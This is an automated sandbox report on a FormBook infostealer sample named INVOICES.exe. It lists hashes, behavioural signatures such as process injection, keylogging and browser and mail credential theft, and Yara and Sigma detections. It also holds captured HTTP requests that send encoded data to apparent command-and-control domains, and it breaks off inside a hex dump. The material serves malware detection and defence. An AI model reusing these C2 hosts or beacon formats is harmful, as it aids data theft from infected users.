Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
INVOICES.exe

Overview

General Information

Sample name:INVOICES.exe
Analysis ID:1544728
MD5:90c8ef1083fbf63ae33f23d51513a611
SHA1:28513b7108e382d811902d22d3749568adf296eb
SHA256:bfd180717755dd026fcbc5b370cea34a1ed365deb5e512420b63a5382f111764
Tags:exeFormbookuser-Racco42
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • INVOICES.exe (PID: 7836 cmdline: "C:\Users\user\Desktop\INVOICES.exe" MD5: 90C8EF1083FBF63AE33F23D51513A611)
    • svchost.exe (PID: 7900 cmdline: "C:\Users\user\Desktop\INVOICES.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • XORjEgwNIUb.exe (PID: 6112 cmdline: "C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • AtBroker.exe (PID: 8088 cmdline: "C:\Windows\SysWOW64\AtBroker.exe" MD5: D5B61959A509BDA85300781F5A829610)
          • XORjEgwNIUb.exe (PID: 5072 cmdline: "C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7636 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.3877127380.0000000000D60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3875893273.0000000000340000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000005.00000002.3877005602.0000000000930000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000002.00000002.1651329833.0000000003490000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.1654342305.0000000003C00000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\INVOICES.exe", CommandLine: "C:\Users\user\Desktop\INVOICES.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\INVOICES.exe", ParentImage: C:\Users\user\Desktop\INVOICES.exe, ParentProcessId: 7836, ParentProcessName: INVOICES.exe, ProcessCommandLine: "C:\Users\user\Desktop\INVOICES.exe", ProcessId: 7900, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\INVOICES.exe", CommandLine: "C:\Users\user\Desktop\INVOICES.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\INVOICES.exe", ParentImage: C:\Users\user\Desktop\INVOICES.exe, ParentProcessId: 7836, ParentProcessName: INVOICES.exe, ProcessCommandLine: "C:\Users\user\Desktop\INVOICES.exe", ProcessId: 7900, ProcessName: svchost.exe

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Multi AV Scanner detection for submitted file
                Source: INVOICES.exeReversingLabs: Detection: 47%
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3877127380.0000000000D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3875893273.0000000000340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3877005602.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1651329833.0000000003490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1654342305.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3877109191.00000000027F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1651003689.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: INVOICES.exeJoe Sandbox ML: detected
                Source: INVOICES.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XORjEgwNIUb.exe, 00000004.00000002.3876547511.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3876353639.0000000000B5E000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: ATBroker.pdb source: svchost.exe, 00000002.00000003.1619091863.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1618993027.000000000301B000.00000004.00000020.00020000.00000000.sdmp, XORjEgwNIUb.exe, 00000004.00000003.1948840175.0000000000D2B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: INVOICES.exe, 00000000.00000003.1410165013.0000000003880000.00000004.00001000.00020000.00000000.sdmp, INVOICES.exe, 00000000.00000003.1410750742.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1553555103.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1651377631.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1651377631.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1551393196.0000000003200000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000003.1693952018.0000000004385000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3878957220.00000000046F0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000003.1696017970.000000000453E000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3878957220.000000000488E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: INVOICES.exe, 00000000.00000003.1410165013.0000000003880000.00000004.00001000.00020000.00000000.sdmp, INVOICES.exe, 00000000.00000003.1410750742.0000000003A20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1553555103.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1651377631.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1651377631.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1551393196.0000000003200000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, AtBroker.exe, 00000005.00000003.1693952018.0000000004385000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3878957220.00000000046F0000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000003.1696017970.000000000453E000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3878957220.000000000488E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: AtBroker.exe, 00000005.00000002.3881258314.0000000004D1C000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3876263575.000000000073A000.00000004.00000020.00020000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.000000000307C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.000000002684C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: ATBroker.pdbGCTL source: svchost.exe, 00000002.00000003.1619091863.000000000302B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1618993027.000000000301B000.00000004.00000020.00020000.00000000.sdmp, XORjEgwNIUb.exe, 00000004.00000003.1948840175.0000000000D2B000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: AtBroker.exe, 00000005.00000002.3881258314.0000000004D1C000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000005.00000002.3876263575.000000000073A000.00000004.00000020.00020000.00000000.sdmp, XORjEgwNIUb.exe, 00000006.00000002.3877613506.000000000307C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1989077842.000000002684C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079449B GetFileAttributesW,FindFirstFileW,FindClose,0_2_0079449B
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079C75D FindFirstFileW,FindClose,0_2_0079C75D
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0079C7E8
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0079F021
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0079F17E
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079F47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0079F47F
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00793833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00793833
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_00793B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00793B56
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_0079BD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0079BD48
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 5_2_0035C720 FindFirstFileW,FindNextFileW,FindClose,5_2_0035C720
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 4x nop then xor eax, eax5_2_00349DE0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 4x nop then mov ebx, 00000004h5_2_044304DF

                Networking

                barindex
                Performs DNS queries to domains with low reputation
                Source: DNS query: www.68529.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 199.59.243.227 199.59.243.227
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\INVOICES.exeCode function: 0_2_007A2404 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_007A2404
                Source: global trafficHTTP traffic detected: GET /hzvv/?mRR=Vxudf0fHzLw84n3P&edD=rORncVVdvgzWlpxqVdy6wyOp/+Tf7AwoM18MThSKdmZP0ohcmrwEBuX8zFjiIhpadHd1pz5OrNzpltMAb4bxQj9ydLcasKlfpoifhU3jpBZMJYPNfPfapl2Jiho/Qt0KOg== HTTP/1.1Host: www.dpo-medicina.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /026w/?edD=lYgGcuisybLP7Ls1fGp6HIm4b0bJG5Li1NyGnRgJosPR9gPGPpYXP8moMcmegmveynv5+gYGX20ShvoOLspZRc66KMIi0XTCODv4m7XI1igXQNISi3YQnFgtoSZ+M/H7bQ==&mRR=Vxudf0fHzLw84n3P HTTP/1.1Host: www.gold-rates.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /b8ns/?edD=AHsT2lQM7afkvhgrd3a+ObbJ1OaVFxW6qPC56vyLY+r/hbqOgzan0xtCN8OL4Bj/PuszXJHvjvqxiuIPtsWv0tAUFBubyxcqdahqlM3D7pXLIOqGlrWJuLpzoNBd4O/a7Q==&mRR=Vxudf0fHzLw84n3P HTTP/1.1Host: www.loginov.enterprisesAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1t94/?edD=gjMIJwSCW/9UgfmDC9v9JuEAXY9+Tk/wxiwa2AwzMfTndCXl3IsTOH3xQbqTIzs3KmqJPz6XjFO/L3LQlwMgjZ5WYlhZ6IbItanfVRefUclVTIAe/3x+VFj+y2sVXiouoQ==&mRR=Vxudf0fHzLw84n3P HTTP/1.1Host: www.2925588.comAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /pq4g/?mRR=Vxudf0fHzLw84n3P&edD=/x7ZrZ76GI+PVQICx+fJsRsDfPwUjqoVDZRMpFR2TevR7yRDJNTVJQ5a4wLIxcipLtxsrpwhId74rtIBLdbLD5OWdqbGxCnsQwRTx3/JOzhGR6ZHHmQh6NCPA8f1t14f7g== HTTP/1.1Host: www.treatyourownhip.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /4sq5/?edD=auinYk/N7fzuxFx7OuKPDQsKV8iAhIfXxmAc+9FVGd08SK7om5hBOw/tR9MrAyioRLaXqFIVFqwDeVrkz6gRFEBF2GjT/+1q0RocL006XFUWck2TAJQGogQWHAk4IwcjPQ==&mRR=Vxudf0fHzLw84n3P HTTP/1.1Host: www.premium303max.restAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /xene/?mRR=Vxudf0fHzLw84n3P&edD=oQfmtMAR504qWoEoIiuXkIZ390sDtx871CN+h8gaaxvvjR4IOOhM8LL7s1MwTzNJoD6YjSoePunXYwEMUYhUEvd3KGx73JHR40wuRl04yT55myu+mdIWD34OfxSC3JH3Pw== HTTP/1.1Host: www.adsdomain-195.clickAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /mivl/?edD=NCBdkbAo51Pk6OQCOHBLNPGGoFWb7jFDRfsqOlllsQkjLkqguOrgRg1KSY2RNLpxIpBa/WYuubaTkbJsfRdnK6r1gpJDlK+mMheAcqBYNXKJFvncR+Lje3KwNZ7V3SHyOg==&mRR=Vxudf0fHzLw84n3P HTTP/1.1Host: www.broork.sbsAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /uye5/?mRR=Vxudf0fHzLw84n3P&edD=75F1ULhw6FwEjpnDA0ShEFdlFdwdGFO+6cO+diyrF+sYFY6hrAWtaaFZiFMruwmlEHMkL4DDBtvLLE4rNUa6rOrOasIwOIgL2b+vXbiOxUsIxCPoWDvEXykJs0FHlhf94g== HTTP/1.1Host: www.nutrigenfit.onlineAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /ak8m/?edD=rnlDhCsdJ2ooBNmRxWrIjnPAthAEmDTBnoEBgto8r48ZfNeG/PnUuRGB6UxkEvrVIavN7L12K9gGymeMzCPkQjaYFwN3T3JuEHWt+eu64/V1Op0q2QF2dqSePIe0BpSPtA==&mRR=Vxudf0fHzLw84n3P HTTP/1.1Host: www.plyvik.infoAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /2su7/?edD=pamwepkWr5FhGLIp9e9dE5wxTwNKoV0OitnUuyON/V0YdhH090qorkisWAKc74xRI1QLgpFLJyIK92bUXzceQHZBiR72PVsC64CKK1bLyHz9EtZqc0FSRzmTtcqhmMmMlg==&mRR=Vxudf0fHzLw84n3P HTTP/1.1Host: www.68529.xyzAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /taxt/?edD=r1Iubw6Wh8IGmXw0YJVaMoRCD3peRXEmz6ievL1zkHtXMQX/g3sK5IHJ6rQ7ggOc23QC6zmWJBnuHS8GGugfDzOdB1VYvGABqxLnspqtMyj1CdMgVpHhi3ZxRPJaa26iDA==&mRR=Vxudf0fHzLw84n3P HTTP/1.1Host: www.bulbulun.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /trf9/?edD=SX2oC5m45uYB1tV1xPAlHQ9pkf41HJggIgPCWZhvHUcjHM/w8Nd3jQ2tXPB/QOacw2gE0ne7LAGFXkFnbZ4l5ULW4r3r0ogn7NokvyLyFgbvViqVA80wJ4db34DSXGAE4g==&mRR=Vxudf0fHzLw84n3P HTTP/1.1Host: www.smithsmobilewash.netAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /phwy/?edD=NOQPwZ+XOddShCAJaqjiSDvaSyosQYNdt8f0tOcuwTalyoR7fBY1X5bax8h0+UleX8GnGxtat7FR1fTM5b1BgdcwV2K5MrO24q3i2hacl5vfdQcLdxPRe77ACw5W73Ddrw==&mRR=Vxudf0fHzLw84n3P HTTP/1.1Host: www.2q33e.topAccept: */*Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                Source: global trafficDNS traffic detected: DNS query: www.dpo-medicina.online
                Source: global trafficDNS traffic detected: DNS query: www.gold-rates.online
                Source: global trafficDNS traffic detected: DNS query: www.loginov.enterprises
                Source: global trafficDNS traffic detected: DNS query: www.2925588.com
                Source: global trafficDNS traffic detected: DNS query: www.treatyourownhip.online
                Source: global trafficDNS traffic detected: DNS query: www.premium303max.rest
                Source: global trafficDNS traffic detected: DNS query: www.adsdomain-195.click
                Source: global trafficDNS traffic detected: DNS query: www.broork.sbs
                Source: global trafficDNS traffic detected: DNS query: www.nutrigenfit.online
                Source: global trafficDNS traffic detected: DNS query: www.plyvik.info
                Source: global trafficDNS traffic detected: DNS query: www.68529.xyz
                Source: global trafficDNS traffic detected: DNS query: www.bulbulun.net
                Source: global trafficDNS traffic detected: DNS query: www.smithsmobilewash.net
                Source: global trafficDNS traffic detected: DNS query: www.2q33e.top
                Source: global trafficDNS traffic detected: DNS query: www.tangible.online
                Source: unknownHTTP traffic detected: POST /026w/ HTTP/1.1Host: www.gold-rates.onlineAccept: */*Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Origin: http://www.gold-rates.onlineReferer: http://www.gold-rates.online/026w/Content-Type: application/x-www-form-urlencodedCache-Control: no-cacheConnection: closeContent-Length: 204User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36Data Raw: 65 64 44 3d 6f 61 49 6d 66 61 75 31 2f 39 7a 5a 31 72 39 4c 47 67 42 54 66 37 43 47 55 6c 7a 55 47 37 6a 6a 37 73 79 4b 6d 32 46 4f 68 4e 75 7a 6e 54 50 44 62 36 52 38 62 6f 32 48 47 63 75 4e 72 32 58 51 69 33 2b 4a 68 54 6f 41 41 6d 4a 6d 6e 64 64 58 41 38 63 65 62 6f 65 61 41 50 6f 46 34 55 66 43 63 79 36 30 6e 35 6e 31 77 78 42 56 54 4f 51 57 6f 6e 38 4f 6f 43 67 52 78 6a 6c 56 41 70 53 4b 50 55 6f 66 6a 62 75 4a 37 54 43 55 75 68 54 4b 57 55 7a 4f 52 6c 57 74 6b 59 5a 42 57 57 36 43 77 74 2b 45 62 6b 65 46 66 71 5a 59 2b 76 36 55 6c 75 4f 47 64 48 36 58 2f 41 4e 49 58 4f 4d 6e 79 36 44 75 71 63 34 3d Data Ascii: edD=oaImfau1/9zZ1r9LGgBTf7CGUlzUG7jj7syKm2FOhNuznTPDb6R8bo2HGcuNr2XQi3+JhToAAmJmnddXA8ceboeaAPoF4UfCcy60n5n1wxBVTOQWon8OoCgRxjlVApSKPUofjbuJ7TCUuhTKWUzORlWtkYZBWW6Cwt+EbkeFfqZY+v6UluOGdH6X/ANIXOMny6Duqc4=
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 29 Oct 2024 15:54:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 32 35 31 37 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 64 70 6f 2d 6d 65 64 69 63 69 6e 61 2e 6f 6e 6c 69 6e 65 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 